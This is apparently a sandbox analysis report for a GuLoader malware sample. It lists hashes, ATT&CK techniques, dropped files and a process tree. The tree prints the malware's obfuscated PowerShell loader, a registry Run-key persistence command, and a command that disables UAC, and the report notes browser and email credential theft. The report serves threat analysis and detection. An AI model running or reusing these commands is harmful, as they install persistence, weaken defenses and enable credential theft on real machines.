guloader | b5da8d86a9d0d8fcfbb38f20f2fe9be5ffc105bc5c1879eb4cbb9b7d84a8b48c

Analysis

max time kernel
149s
max time network
149s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
04-09-2024 01:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

39f1703e13bdc112f4ffe9240f70cd5eb5b07cc218e6b22a8d58e4dcfaadd0a1.exe
Size

458KB
MD5

61bdbe7854f1572202f7916cf7f03616
SHA1

e03a3385bc0cd5869c2a8cc72c80f4115b7b7945
SHA256

39f1703e13bdc112f4ffe9240f70cd5eb5b07cc218e6b22a8d58e4dcfaadd0a1
SHA512

b9b41ede8456e65669ddf068bd6d277d60a7f2d233fa947636f998e9f77bc9be72a4b27884c9cc1bb979bbc0a8488ba8efa32375258492eb712ed864eca3a9c6
SSDEEP

12288:rKYi/LYz3kRV6h/3lObHOjeP/AxozXkYD:GFDg3ZhvlwHWiYx2UYD

Score

10^/10

guloader collection credential_access discovery downloader evasion execution persistence stealer trojan

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral1/memory/1588-226-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/896-224-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral1/memory/1740-223-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral1/memory/896-224-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral1/memory/1740-223-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 10 IoCs

flow	pid	Process
5	1288	powershell.exe
7	1288	powershell.exe
9	1288	powershell.exe
11	1288	powershell.exe
13	1288	powershell.exe
15	1288	powershell.exe
16	1288	powershell.exe
17	1288	powershell.exe
19	1288	powershell.exe
20	1288	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1288	powershell.exe

Loads dropped DLL 3 IoCs

pid	Process
2260	39f1703e13bdc112f4ffe9240f70cd5eb5b07cc218e6b22a8d58e4dcfaadd0a1.exe
2260	39f1703e13bdc112f4ffe9240f70cd5eb5b07cc218e6b22a8d58e4dcfaadd0a1.exe
2260	39f1703e13bdc112f4ffe9240f70cd5eb5b07cc218e6b22a8d58e4dcfaadd0a1.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\Preferentialist = "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\\Corycia\\').mandskaber;%Therapeutic% ($Terrain)"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
4	drive.google.com
5	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
1288	powershell.exe
1288	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
1288	powershell.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 1288 set thread context of 1740	1288	powershell.exe	42
PID 1288 set thread context of 896	1288	powershell.exe	43
PID 1288 set thread context of 1588	1288	powershell.exe	44

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	39f1703e13bdc112f4ffe9240f70cd5eb5b07cc218e6b22a8d58e4dcfaadd0a1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
1524	reg.exe
1756	reg.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
1288	powershell.exe
1288	powershell.exe
1288	powershell.exe
1288	powershell.exe
1288	powershell.exe
1288	powershell.exe
1288	powershell.exe
1288	powershell.exe
1740	powershell.exe
1740	powershell.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
1288	powershell.exe
1288	powershell.exe
1288	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1288	powershell.exe
Token: SeDebugPrivilege	1588	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1288	powershell.exe

Suspicious use of WriteProcessMemory 35 IoCs

description	pid	Process	procid_target
PID 2260 wrote to memory of 1288	2260	39f1703e13bdc112f4ffe9240f70cd5eb5b07cc218e6b22a8d58e4dcfaadd0a1.exe	30
PID 2260 wrote to memory of 1288	2260	39f1703e13bdc112f4ffe9240f70cd5eb5b07cc218e6b22a8d58e4dcfaadd0a1.exe	30
PID 2260 wrote to memory of 1288	2260	39f1703e13bdc112f4ffe9240f70cd5eb5b07cc218e6b22a8d58e4dcfaadd0a1.exe	30
PID 2260 wrote to memory of 1288	2260	39f1703e13bdc112f4ffe9240f70cd5eb5b07cc218e6b22a8d58e4dcfaadd0a1.exe	30
PID 1288 wrote to memory of 1780	1288	powershell.exe	35
PID 1288 wrote to memory of 1780	1288	powershell.exe	35
PID 1288 wrote to memory of 1780	1288	powershell.exe	35
PID 1288 wrote to memory of 1780	1288	powershell.exe	35
PID 1780 wrote to memory of 1756	1780	cmd.exe	37
PID 1780 wrote to memory of 1756	1780	cmd.exe	37
PID 1780 wrote to memory of 1756	1780	cmd.exe	37
PID 1780 wrote to memory of 1756	1780	cmd.exe	37
PID 1288 wrote to memory of 344	1288	powershell.exe	39
PID 1288 wrote to memory of 344	1288	powershell.exe	39
PID 1288 wrote to memory of 344	1288	powershell.exe	39
PID 1288 wrote to memory of 344	1288	powershell.exe	39
PID 344 wrote to memory of 1524	344	cmd.exe	41
PID 344 wrote to memory of 1524	344	cmd.exe	41
PID 344 wrote to memory of 1524	344	cmd.exe	41
PID 344 wrote to memory of 1524	344	cmd.exe	41
PID 1288 wrote to memory of 1740	1288	powershell.exe	42
PID 1288 wrote to memory of 1740	1288	powershell.exe	42
PID 1288 wrote to memory of 1740	1288	powershell.exe	42
PID 1288 wrote to memory of 1740	1288	powershell.exe	42
PID 1288 wrote to memory of 1740	1288	powershell.exe	42
PID 1288 wrote to memory of 896	1288	powershell.exe	43
PID 1288 wrote to memory of 896	1288	powershell.exe	43
PID 1288 wrote to memory of 896	1288	powershell.exe	43
PID 1288 wrote to memory of 896	1288	powershell.exe	43
PID 1288 wrote to memory of 896	1288	powershell.exe	43
PID 1288 wrote to memory of 1588	1288	powershell.exe	44
PID 1288 wrote to memory of 1588	1288	powershell.exe	44
PID 1288 wrote to memory of 1588	1288	powershell.exe	44
PID 1288 wrote to memory of 1588	1288	powershell.exe	44
PID 1288 wrote to memory of 1588	1288	powershell.exe	44

C:\Users\Admin\AppData\Local\Temp\39f1703e13bdc112f4ffe9240f70cd5eb5b07cc218e6b22a8d58e4dcfaadd0a1.exe
"C:\Users\Admin\AppData\Local\Temp\39f1703e13bdc112f4ffe9240f70cd5eb5b07cc218e6b22a8d58e4dcfaadd0a1.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2260
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\Admin\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:1288
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1780
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preferentialist" /t REG_EXPAND_SZ /d "%Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)"
      4⤵
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:1756
- - C:\Windows\SysWOW64\cmd.exe
    /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:344
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      UAC bypass
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:1524
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\sbvrkjguwrakgvnadszsiqnfskeicmd"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:1740
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\cvij"
    3⤵
    - Accesses Microsoft Outlook accounts
    - System Location Discovery: System Language Discovery
    PID:896
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\exnuluc"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:1588

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
126B

MD5
5b96bfeb855724a4f7fac8c3d9eb19c5

SHA1
ecf788355f1de37d7681d201718518059fd979bb

SHA256
0b9e281bac88bd756557c3bc1d509e4db1fd3a411b9d480c0bcf48aee4eccfe8

SHA512
b56efcb826306e1644fe032a9026f3b362d8451205a67614006bca67a930d57b7e8927705461fd3dd11ebfc41cf5c1639f66b651f87b5e2eff81faf83ab70ff7

Download Submit
C:\Users\Admin\AppData\Local\Temp\Servicebureauet\aloe\Angiosperm.Sla

Filesize
310KB

MD5
74c243e34b9fafdd090165d998591c37

SHA1
376964338a52695316fad59455cd23269312cc21

SHA256
ea92d267a29ebea630fc51e02b9e7c42683216b1b4bf1075063a58529657ab16

SHA512
4670d7e9efe8d9738f9406e741991bf8e52de94eae4c202441e7c0457b4c120f6033893e4b1b1ddd69410ec3c39d8edf3c86905ca41a7aab1bd4b2fb9e06657c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea

Filesize
68KB

MD5
e857291cf7cdcfd0413d85abdb01f724

SHA1
f4c0728ba5a0e78bc19489425dfb634327cd664d

SHA256
4df3727a11c8e633d68d7dfb08f7a679aea4b0cfcbda2d54da547499a9c66e16

SHA512
1007e794c375819bf7e1011bc27077422fc40b3b8648f2aae98cdceba26e0c0944cc82bd6fe93b55b65a87c828b866aaf1260e588bb94d3088635e035ba71f30

Download Submit
C:\Users\Admin\AppData\Local\Temp\sbvrkjguwrakgvnadszsiqnfskeicmd

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\Desktop\Flyverdragter.lnk

Filesize
1KB

MD5
ee799ff3f19d8a939028343a8a815f6f

SHA1
ff6cba4df1791c066510f1281ef4f84f347d7864

SHA256
d7acb2a5964370970193b9d9f1ba3a21929831624c0e096021a6b544fc882e20

SHA512
353c801e468ca8e6435d4f76f455237cf3ace04b9c7d513b4b751b46a55551b367592aeeb88daa9847a1c4da240d7e720934368c03752d8b976650b5ba1c6c85

Download Submit
\Users\Admin\AppData\Local\Temp\nsjC2C4.tmp\BgImage.dll

Filesize
7KB

MD5
350a507070ed063ac6a511aeef67861a

SHA1
cf647b90a1212e090f1d236d1b50a5010cbf3bae

SHA256
5c66abd3f06eaa357ed9663224c927cf7120dca010572103faa88832bb31c5ab

SHA512
cde5747cc8539625e4262afad9699ce4e8325133d7ed7f47b9d46989a7aa0d2cc2488441acc57368f485ef1dd3e02b9ef2faa642f68e9f1db53a39e0f896d468

Download Submit
\Users\Admin\AppData\Local\Temp\nsjC2C4.tmp\nsDialogs.dll

Filesize
9KB

MD5
13b6a88cf284d0f45619e76191e2b995

SHA1
09ebb0eb4b1dca73d354368414906fc5ad667e06

SHA256
cb958e21c3935ef7697a2f14d64cae0f9264c91a92d2deeb821ba58852dac911

SHA512
2aeeae709d759e34592d8a06c90e58aa747e14d54be95fb133994fdcebb1bdc8bc5d82782d0c8c3cdfd35c7bea5d7105379d3c3a25377a8c958c7b2555b1209e

Download Submit
\Users\Admin\AppData\Local\Temp\nsjC2C4.tmp\nsExec.dll

Filesize
6KB

MD5
b648c78981c02c434d6a04d4422a6198

SHA1
74d99eed1eae76c7f43454c01cdb7030e5772fc2

SHA256
3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9

SHA512
219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2

Download Submit
memory/896-218-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/896-224-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/896-222-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/896-217-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/1288-183-0x00000000737A0000-0x0000000073D4B000-memory.dmp

Filesize
5.7MB

Download
memory/1288-185-0x00000000737A0000-0x0000000073D4B000-memory.dmp

Filesize
5.7MB

Download
memory/1288-192-0x00000000737A0000-0x0000000073D4B000-memory.dmp

Filesize
5.7MB

Download
memory/1288-212-0x0000000009510000-0x000000000A572000-memory.dmp

Filesize
16.4MB

Download
memory/1288-213-0x0000000006500000-0x000000000950D000-memory.dmp

Filesize
48.1MB

Download
memory/1288-190-0x00000000737A0000-0x0000000073D4B000-memory.dmp

Filesize
5.7MB

Download
memory/1288-188-0x00000000737A0000-0x0000000073D4B000-memory.dmp

Filesize
5.7MB

Download
memory/1288-181-0x00000000737A1000-0x00000000737A2000-memory.dmp

Filesize
4KB

Download
memory/1288-236-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/1288-237-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/1288-233-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/1288-191-0x0000000006500000-0x000000000950D000-memory.dmp

Filesize
48.1MB

Download
memory/1288-184-0x00000000737A0000-0x0000000073D4B000-memory.dmp

Filesize
5.7MB

Download
memory/1288-182-0x00000000737A0000-0x0000000073D4B000-memory.dmp

Filesize
5.7MB

Download
memory/1588-220-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1588-226-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1588-225-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1740-221-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1740-223-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1740-215-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/1740-216-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download